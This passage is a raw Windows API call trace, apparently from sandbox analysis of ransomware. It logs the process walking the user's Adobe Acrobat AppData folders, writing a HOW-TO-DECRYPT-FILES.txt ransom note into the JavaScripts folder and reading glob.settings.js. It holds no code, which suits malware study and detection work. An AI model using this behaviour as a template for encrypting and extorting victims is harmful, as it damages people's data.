lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe", lpFilePart=0x0) returned 0x26 [0051.813] GetLastError () returned 0x5 [0051.813] SetErrorMode (uMode=0x1) returned 0x0 [0051.813] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0051.827] GetLastError () returned 0x5 [0051.827] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.827] GetLastError () returned 0x5 [0051.827] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.827] GetLastError () returned 0x5 [0051.828] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.828] GetLastError () returned 0x5 [0051.828] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.828] GetLastError () returned 0x5 [0051.828] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.828] GetLastError () returned 0x5 [0051.828] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.828] GetLastError () returned 0x5 [0051.828] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0051.828] GetLastError () returned 0x12 [0051.828] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0051.829] SetErrorMode (uMode=0x0) returned 0x1 [0051.829] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe", lpFilePart=0x0) returned 0x26 [0051.829] GetLastError () returned 0x12 [0051.829] SetErrorMode (uMode=0x1) returned 0x0 [0051.829] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0051.830] GetLastError () returned 0x12 [0051.830] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.830] GetLastError () returned 0x12 [0051.830] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.830] GetLastError () returned 0x12 [0051.830] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.830] GetLastError () returned 0x12 [0051.831] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.831] GetLastError () returned 0x12 [0051.831] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.831] GetLastError () returned 0x12 [0051.831] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.831] GetLastError () returned 0x12 [0051.831] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0051.831] GetLastError () returned 0x12 [0051.831] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0051.832] SetErrorMode (uMode=0x0) returned 0x1 [0051.832] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat", nBufferLength=0x105, lpBuffer=0x18e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat", lpFilePart=0x0) returned 0x2e [0051.832] GetLastError () returned 0x12 [0051.832] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0051.832] GetLastError () returned 0x12 [0051.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0051.832] GetLastError () returned 0x12 [0051.832] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat", lpFilePart=0x0) returned 0x2e [0051.832] GetLastError () returned 0x12 [0051.832] SetErrorMode (uMode=0x1) returned 0x0 [0051.832] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0051.833] GetLastError () returned 0x12 [0051.833] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.833] GetLastError () returned 0x12 [0051.834] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.834] GetLastError () returned 0x12 [0051.834] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0051.834] GetLastError () returned 0x12 [0051.834] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0051.834] SetErrorMode (uMode=0x0) returned 0x1 [0051.834] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat", lpFilePart=0x0) returned 0x2e [0051.834] GetLastError () returned 0x12 [0051.834] SetErrorMode (uMode=0x1) returned 0x0 [0051.834] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0051.834] GetLastError () returned 0x12 [0051.834] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.834] GetLastError () returned 0x12 [0051.835] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.835] GetLastError () returned 0x12 [0051.835] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0051.835] GetLastError () returned 0x12 [0051.835] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0051.835] SetErrorMode (uMode=0x0) returned 0x1 [0051.835] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", nBufferLength=0x105, lpBuffer=0x18e850, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", lpFilePart=0x0) returned 0x33 [0051.835] GetLastError () returned 0x12 [0051.835] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0051.835] GetLastError () returned 0x12 [0051.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e774, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0051.835] GetLastError () returned 0x12 [0051.835] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", lpFilePart=0x0) returned 0x33 [0051.835] GetLastError () returned 0x12 [0051.835] SetErrorMode (uMode=0x1) returned 0x0 [0051.835] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0051.836] GetLastError () returned 0x12 [0051.836] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.836] GetLastError () returned 0x12 [0051.836] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.836] GetLastError () returned 0x12 [0051.836] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.836] GetLastError () returned 0x12 [0051.836] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.836] GetLastError () returned 0x12 [0051.836] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.836] GetLastError () returned 0x12 [0051.836] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0051.836] GetLastError () returned 0x12 [0051.836] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0051.837] SetErrorMode (uMode=0x0) returned 0x1 [0051.837] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", lpFilePart=0x0) returned 0x33 [0051.837] GetLastError () returned 0x12 [0051.837] SetErrorMode (uMode=0x1) returned 0x0 [0051.837] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0051.837] GetLastError () returned 0x12 [0051.837] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.837] GetLastError () returned 0x12 [0051.837] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.837] GetLastError () returned 0x12 [0051.837] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.837] GetLastError () returned 0x12 [0051.837] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.837] GetLastError () returned 0x12 [0051.839] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.839] GetLastError () returned 0x12 [0051.840] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0051.840] GetLastError () returned 0x12 [0051.840] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0051.840] SetErrorMode (uMode=0x0) returned 0x1 [0051.840] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab", nBufferLength=0x105, lpBuffer=0x18e7e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab", lpFilePart=0x0) returned 0x3a [0051.840] GetLastError () returned 0x12 [0051.840] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0051.840] GetLastError () returned 0x12 [0051.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e708, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0051.840] GetLastError () returned 0x12 [0051.840] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab", lpFilePart=0x0) returned 0x3a [0051.840] GetLastError () returned 0x12 [0051.840] SetErrorMode (uMode=0x1) returned 0x0 [0051.840] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0051.841] GetLastError () returned 0x12 [0051.842] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.842] GetLastError () returned 0x12 [0051.842] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0051.842] GetLastError () returned 0x12 [0051.842] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0051.842] SetErrorMode (uMode=0x0) returned 0x1 [0051.842] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab", lpFilePart=0x0) returned 0x3a [0051.842] GetLastError () returned 0x12 [0051.842] SetErrorMode (uMode=0x1) returned 0x0 [0051.842] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0051.842] GetLastError () returned 0x12 [0051.842] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.842] GetLastError () returned 0x12 [0051.842] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0051.842] GetLastError () returned 0x12 [0051.843] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0051.843] SetErrorMode (uMode=0x0) returned 0x1 [0051.843] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms", nBufferLength=0x105, lpBuffer=0x18e7e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms", lpFilePart=0x0) returned 0x39 [0051.843] GetLastError () returned 0x12 [0051.843] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0051.843] GetLastError () returned 0x12 [0051.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e708, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0051.843] GetLastError () returned 0x12 [0051.843] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms", lpFilePart=0x0) returned 0x39 [0051.843] GetLastError () returned 0x12 [0051.843] SetErrorMode (uMode=0x1) returned 0x0 [0051.843] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0051.845] GetLastError () returned 0x12 [0051.845] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.845] GetLastError () returned 0x12 [0051.846] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0051.846] GetLastError () returned 0x12 [0051.846] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0051.846] SetErrorMode (uMode=0x0) returned 0x1 [0051.846] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms", lpFilePart=0x0) returned 0x39 [0051.846] GetLastError () returned 0x12 [0051.846] SetErrorMode (uMode=0x1) returned 0x0 [0051.847] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0051.847] GetLastError () returned 0x12 [0051.847] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.847] GetLastError () returned 0x12 [0051.847] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0051.847] GetLastError () returned 0x12 [0051.847] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0051.848] SetErrorMode (uMode=0x0) returned 0x1 [0051.848] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts", nBufferLength=0x105, lpBuffer=0x18e7e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts", lpFilePart=0x0) returned 0x3f [0051.848] GetLastError () returned 0x12 [0051.848] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0051.848] GetLastError () returned 0x12 [0051.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e708, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0051.848] GetLastError () returned 0x12 [0051.848] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts", lpFilePart=0x0) returned 0x3f [0051.848] GetLastError () returned 0x12 [0051.848] SetErrorMode (uMode=0x1) returned 0x0 [0051.848] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0051.848] GetLastError () returned 0x12 [0051.848] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.848] GetLastError () returned 0x12 [0051.848] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.848] GetLastError () returned 0x12 [0051.849] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.849] GetLastError () returned 0x12 [0051.849] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0051.849] GetLastError () returned 0x12 [0051.849] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0051.849] SetErrorMode (uMode=0x0) returned 0x1 [0051.849] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts", lpFilePart=0x0) returned 0x3f [0051.849] GetLastError () returned 0x12 [0051.849] SetErrorMode (uMode=0x1) returned 0x0 [0051.849] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x3609e0 [0051.849] GetLastError () returned 0x12 [0051.849] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.849] GetLastError () returned 0x12 [0051.849] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.849] GetLastError () returned 0x12 [0051.849] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0051.849] GetLastError () returned 0x12 [0051.850] FindNextFileW (in: hFindFile=0x3609e0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0051.850] GetLastError () returned 0x12 [0051.850] FindClose (in: hFindFile=0x3609e0 | out: hFindFile=0x3609e0) returned 1 [0051.850] SetErrorMode (uMode=0x0) returned 0x1 [0051.850] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js", lpFilePart=0x0) returned 0x47 [0051.850] GetLastError () returned 0x12 [0051.850] SetErrorMode (uMode=0x1) returned 0x0 [0051.850] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.js"), fInfoLevelId=0x0, lpFileInformation=0x1cc4a98 | out: lpFileInformation=0x1cc4a98*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb963630, ftCreationTime.dwHighDateTime=0x1d2da18, ftLastAccessTime.dwLowDateTime=0xeb963630, ftLastAccessTime.dwHighDateTime=0x1d2da18, ftLastWriteTime.dwLowDateTime=0xef467a30, ftLastWriteTime.dwHighDateTime=0x1d35a4f, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0051.850] GetLastError () returned 0x12 [0051.850] SetErrorMode (uMode=0x0) returned 0x1 [0051.851] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x58 [0051.851] GetLastError () returned 0x12 [0051.851] SetErrorMode (uMode=0x1) returned 0x0 [0051.851] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.856] GetLastError () returned 0x0 [0051.856] GetFileType (hFile=0x184) returned 0x1 [0051.856] SetErrorMode (uMode=0x0) returned 0x1 [0051.856] GetFileType (hFile=0x184) returned 0x1 [0051.856] WriteFile (in: hFile=0x184, lpBuffer=0x1ce09ac*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18eb7c, lpOverlapped=0x0 | out: lpBuffer=0x1ce09ac*, lpNumberOfBytesWritten=0x18eb7c*=0x18da, lpOverlapped=0x0) returned 1 [0051.859] GetLastError () returned 0x0 [0051.859] CloseHandle (hObject=0x184) returned 1 [0051.859] GetLastError () returned 0x0 [0051.859] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e744, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x58 [0051.859] GetLastError () returned 0x0 [0051.859] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0051.859] GetLastError () returned 0x0 [0051.859] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js", lpFilePart=0x0) returned 0x50 [0051.859] GetLastError () returned 0x0 [0051.859] SetErrorMode (uMode=0x1) returned 0x0 [0051.859] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js"), fInfoLevelId=0x0, lpFileInformation=0x1ce26c0 | out: lpFileInformation=0x1ce26c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb989790, ftCreationTime.dwHighDateTime=0x1d2da18, ftLastAccessTime.dwLowDateTime=0xeb989790, ftLastAccessTime.dwHighDateTime=0x1d2da18, ftLastWriteTime.dwLowDateTime=0xef467a30, ftLastWriteTime.dwHighDateTime=0x1d35a4f, nFileSizeHigh=0x0, nFileSizeLow=0xa)) returned 1 [0051.860] GetLastError () returned 0x0 [0051.860] SetErrorMode (uMode=0x0) returned 0x1 [0051.860] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js", lpFilePart=0x0) returned 0x50 [0051.860] GetLastError () returned 0x0 [0051.860] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js", lpFilePart=0x0) returned 0x50 [0051.860] GetLastError () returned 0x0 [0051.860] SetErrorMode (uMode=0x1) returned 0x0 [0051.860] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.860] GetLastError () returned 0x0 [0051.860] GetFileType (hFile=0x184) returned 0x1 [0051.860] SetErrorMode (uMode=0x0) returned 0x1 [0051.860] GetFileType (hFile=0x184) returned 0x1 [0051.860] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0xa [0051.860] GetLastError () returned 0x0 [0051.860] ReadFile (in: hFile=0x184, lpBuffer=0x1ce43a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x1ce43a0*, lpNumberOfBytesRead=0x18eb68*=0xa, lpOverlapped=0x0) returned 1 [0051.861] GetLastError () returned 0x0 [0051.861] CloseHandle (hObject=0x184) returned 1 [0051.861] GetLastError () returned 0x0 [0051.861] GetFullPathNameW (in: 